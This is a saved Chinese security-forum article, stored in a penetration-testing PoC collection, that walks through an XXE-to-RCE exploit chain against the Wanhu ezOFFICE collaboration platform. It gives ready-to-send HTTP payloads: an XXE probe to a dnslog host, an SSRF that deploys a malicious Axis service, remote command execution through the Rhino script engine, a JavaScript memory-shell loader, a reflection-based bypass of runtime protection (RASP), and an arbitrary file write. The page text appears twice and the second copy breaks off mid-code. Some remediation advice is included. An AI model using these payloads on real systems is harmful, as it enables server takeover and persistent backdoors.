Penetration_Testing_POC/books/万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE.html

<!DOCTYPE html> <html style><!--
Page saved with SingleFile
url: https://forum.butian.net/share/3784
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<title>万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content="奇安信攻防社区-万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE">
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<body>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
之前在实战中遇到过该漏洞，但网上流传的 PoC 质量参差（懂得都懂），索性专门研究一下漏洞成因、利用方式以及内存马注入。
</div>
<textarea id=md_view_content style=display:none value="![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前在实战中遇到过该漏洞，但网上流传的 PoC 质量参差（懂得都懂），索性专门研究一下。
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
其中配置了一个名为 GeneralWeb 的服务，对应实现类为 `com.whir.service.webservice.GeneralWeb`：
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception(&quot;Error: serviceMap can not is null&quot;);
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes(&quot;utf-8&quot;);
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
这里直接用默认配置的 JDOM `SAXBuilder` 解析来自请求体的 `input`：既没有禁用 DTD/外部实体（如设置 `disallow-doctype-decl`、`external-general-entities`、`external-parameter-entities` 等解析器特性），也没有对输入做任何校验，因此产生 XXE 漏洞。本例中它进一步被用作从服务器自身发起 HTTP 请求的 SSRF 原语。
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
鉴权过滤器用 `getRequestURI()` 返回的原始字符串做路径匹配，而该方法返回的是未经规范化的 URI（保留 `/./`、`/../` 以及 `;` 路径参数），Servlet 容器却会在分发前对路径做规范化，于是过滤器看到的路径与实际命中的资源并不一致，可以用多种写法绕过（修复应在去掉 `;` 段并 normalize 之后再匹配，或改用容器已规范化的 `getServletPath()`/`getPathInfo()`，并以默认拒绝的白名单为准）。简单列举几个：
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
先用外部实体请求 dnslog，验证 XXE 是否触发：
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
<soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:gen=&quot;http://com.whir.service/GeneralWeb&quot;>
<soapenv:Body>
<gen:OAManager>
<gen:input>
&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM &quot;http://123.6x9ryk.dnslog.cn&quot;&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
```
由于应用同时部署了 Axis，可以通过其 AdminService 远程部署任意服务。查看 `server-config.wsdd`：
```xml
<service name=&quot;AdminService&quot; provider=&quot;java:MSG&quot;>
<parameter name=&quot;allowedMethods&quot; value=&quot;AdminService&quot;/>
<parameter name=&quot;enableRemoteAdmin&quot; value=&quot;false&quot;/>
<parameter name=&quot;className&quot; value=&quot;org.apache.axis.utils.Admin&quot;/>
<namespace>http://xml.apache.org/axis/wsdd/</namespace>
</service>
```
注意 `enableRemoteAdmin` 为 `false`，即 AdminService 只接受来自本机（127.0.0.1）的请求；而 XXE 解析外部实体时发出的 HTTP 请求正是由服务器自身发出的，因此可以借 XXE 作为 SSRF 从本地访问 AdminService，「仅本机可管理」这一限制在这里形同虚设。思路就很清晰了：通过 XXE 触发的 GET 请求部署恶意服务。由于目标 JDK 版本较低（1.6，自带 Rhino 脚本引擎），可以部署一个 `RhinoScriptEngineService`，把 `com.sun.script.javascript.RhinoScriptEngine` 的 `eval` 方法暴露为 WebService 方法；下面 `method=!--%3E...` 的写法是借 AdminService GET 处理把 `method` 参数拼成 XML 标签的特性，将部署描述夹带进去：
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:jav=&quot;http://javascript.script.sun.com&quot;>
<soapenv:Body>
<eval xmlns=&quot;http://127.0.0.1:8080/services/scriptEngine&quot;>
<arg0 xmlns=&quot;&quot;>
<![CDATA[
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = &quot;cmd /c whoami&quot;;
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(&quot; &quot;)));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]>
</arg0>
<arg1 xmlns=&quot;&quot; xsi:type=&quot;urn:SimpleScriptContext&quot; xmlns:urn=&quot;urn:beanservice&quot;>
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads<https://github.com/yzddmr6/Java-Js-Engine-Payloads>
适配了JDK6-14的内存马
```java
try {
load(&quot;nashorn:mozilla_compat.js&quot;);
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName(&quot;sun.misc.Unsafe&quot;).getDeclaredField(&quot;theUnsafe&quot;);
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(&quot;java.lang.Class&quot;)
.getResourceAsStream(&quot;Class.class&quot;)
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField(&quot;reflectionData&quot;);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
&quot;jdk.internal.reflect.Reflection&quot;
);
} catch (error) {
reflectionClass = java.lang.Class.forName(&quot;sun.reflect.Reflection&quot;);
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream(&quot;Reflection.class&quot;)
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;fieldFilterMap&quot;);
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;methodFilterMap&quot;);
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(&quot;java.lang.Class&quot;));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
&quot;java.lang.reflect.AccessibleObject&quot;
).getDeclaredField(&quot;override&quot;);
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty(&quot;java.version&quot;);
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.net.URL&quot;),
0
)
);
try {
if (version.split(&quot;.&quot;)[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
&quot;java.lang.ClassLoader&quot;
).getDeclaredMethod(
&quot;defineClass&quot;,
java.lang.Class.forName(&quot;[B&quot;),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.security.cert.Certificate&quot;),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName(&quot;sun.misc.BASE64Decoder&quot;).newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName(&quot;java.util.Base64&quot;).newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
低版本 JBoss 内嵌的 Web 容器是 Tomcat，所以直接使用 Tomcat 内存马即可。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
这里选择 Listener 类型的内存马，注入方式相对简单、容错性较高。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行后无报错且返回 200，说明注入成功。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
说明目标部署了 RASP，而 RASP 通常是基于黑名单（对特定类/方法打 hook）进行拦截的。
这里被拦截的是 `ProcessBuilder`，于是尝试更底层的命令执行入口 `java.lang.ProcessImpl`：`Runtime.exec`/`ProcessBuilder.start` 最终都会走到 `ProcessImpl.start`，该类不是 public 的（包私有），只能通过反射调用。从防御角度看，hook 点应放在这一层的共同入口而不是上层 API，否则很容易像这样被绕过。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
JDK 1.6 与 JDK 1.8 中 `ProcessImpl.start` 的参数列表存在差异，需要按目标版本调整反射时传入的参数类型。
但在 Rhino 脚本里调用 `setAccessible` 时会报错：
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method &quot;setAccessible&quot; of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
报错说明脚本层拿到的 Method 对象为 null，这一步反射在 JS 中走不通；参考公开文章的做法，改为把反射逻辑编译成 class 文件写入目标机器，再用 `URLClassLoader` 加载执行：
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = &quot;&quot;;
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty(&quot;os.name&quot;);
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains(&quot;win&quot;)) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{&quot;bash&quot;, &quot;-c&quot;, paramString} : new String[]{&quot;cmd.exe&quot;, &quot;/c&quot;, paramString};
Class clazz = Class.forName(&quot;java.lang.ProcessImpl&quot;);
Method method = clazz.getDeclaredMethod(&quot;start&quot;, String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
RASP 并未拦截 `File`/`FileOutputStream` 等文件写操作，因此可以先把 class 文件落地到服务器上（这里写到 JBoss 的 `../server/` 目录）。这也说明只覆盖命令执行的 RASP 策略是不完整的——任意文件写同样是一条通往 RCE 的路径。
```java
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File(&quot;../server/Testcmd.class&quot;);
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer(&quot;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&quot;);
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
剩下的加载与调用步骤就是网上公开的 PoC 了。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在另一种方法：通过 Axis 把 `com.whir.ezoffice.ezform.util.StringUtil` 部署为服务，利用其写文件的方法。
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
该类存在无参构造方法，满足 Axis `java:RPC` provider 实例化服务类的条件。
```java
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
String dirPath = &quot;&quot;;
if (fileName.lastIndexOf(&quot;/&quot;) != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf(&quot;/&quot;));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException(&quot;create directory '&quot; + dirPath + &quot;' failed!&quot;);
}
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + &quot;\n&quot;);
}
```
`printToFile`/`printlnToFile` 是 public static 方法，`fileName` 与 `content` 均来自调用方且未做任何校验：`writeToFile` 会先用 `mkdirs()` 创建不存在的目录，再以追加模式（`FileOutputStream(fileName, true)`）写入，因此可以向任意路径写入（追加）任意内容，`../` 这类路径穿越也不会被拦。
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上流传的众多 `freemarkerQa` 服务 PoC，实际上调用的都是这个类。
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:util=&quot;http://util.ezform.ezoffice.whir.com&quot;>
<soapenv:Body>
<util:printToFile soapenv:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>
<fileName xsi:type=&quot;soapenc:string&quot; xmlns:soapenc=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>../server/oa/deploy/defaultroot.war/1.txt</fileName>
<content xsi:type=&quot;soapenc:string&quot;>x</content>
</util:printToFile>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞，但网上的 PoC 质量实在一般。
除 Rhino 外还可以尝试 freemarker、bsh 等其他可被 Axis 部署的类。从修复角度看，需要同时处理链条上的每一环：XML 解析器禁用 DTD 与外部实体；鉴权过滤器对规范化后的路径做匹配（或改为默认拒绝的白名单）；移除或禁用 Axis AdminService，至少不要依赖「仅本机可访问」这一限制，因为 SSRF 会绕过它；对 StringUtil 这类可被暴露为服务的工具类做收敛。
万户作为老牌 OA 还是很值得学习研究的。
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)">![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前在实战中遇到过该漏洞，但网上流传的 PoC 质量参差（懂得都懂），索性专门研究一下。
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
其中配置了一个名为 GeneralWeb 的服务，对应实现类为 `com.whir.service.webservice.GeneralWeb`：
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception("Error: serviceMap can not is null");
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes("utf-8");
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
使用默认配置的 SAXBuilder 进行解析，未禁用 DOCTYPE/外部实体，也未对输入做任何过滤，因此产生 XXE 漏洞
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
鉴权判断用的是 getRequestURI 返回的原始（未规范化）路径，那么就有很多绕过方法了，简单列举几个：
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
触发dnslog
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb"&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM "http://123.6x9ryk.dnslog.cn"&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
因为使用了 Axis，我们可以通过 AdminServlet 创建任意服务，看 server-config.wsdd 中的配置：
```xml
&lt;service name="AdminService" provider="java:MSG"&gt;
&lt;parameter name="allowedMethods" value="AdminService"/&gt;
&lt;parameter name="enableRemoteAdmin" value="false"/&gt;
&lt;parameter name="className" value="org.apache.axis.utils.Admin"/&gt;
&lt;namespace&gt;http://xml.apache.org/axis/wsdd/&lt;/namespace&gt;
&lt;/service&gt;
```
那么思路就很清晰了：AdminService 配置了 enableRemoteAdmin=false，只接受来自本机的请求，因此借助 XXE 发起本地 GET 请求来部署恶意服务；由于 JDK 是低版本，可以部署 RhinoScriptEngineService
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"&gt;
&lt;soapenv:Body&gt;
&lt;eval xmlns="http://127.0.0.1:8080/services/scriptEngine"&gt;
&lt;arg0 xmlns=""&gt;
&lt;![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = "cmd /c whoami";
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(" ")));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"&gt;
&lt;/arg1&gt;
&lt;/eval&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads&lt;https://github.com/yzddmr6/Java-Js-Engine-Payloads&gt;
适配了JDK6-14的内存马
```java
try {
load("nashorn:mozilla_compat.js");
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName("java.lang.Class")
.getResourceAsStream("Class.class")
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField("reflectionData");
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
"jdk.internal.reflect.Reflection"
);
} catch (error) {
reflectionClass = java.lang.Class.forName("sun.reflect.Reflection");
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream("Reflection.class")
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField("methodFilterMap");
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName("java.lang.Class"));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
"java.lang.reflect.AccessibleObject"
).getDeclaredField("override");
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty("java.version");
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName("java.net.URL"),
0
)
);
try {
if (version.split(".")[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
"java.lang.ClassLoader"
).getDeclaredMethod(
"defineClass",
java.lang.Class.forName("[B"),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
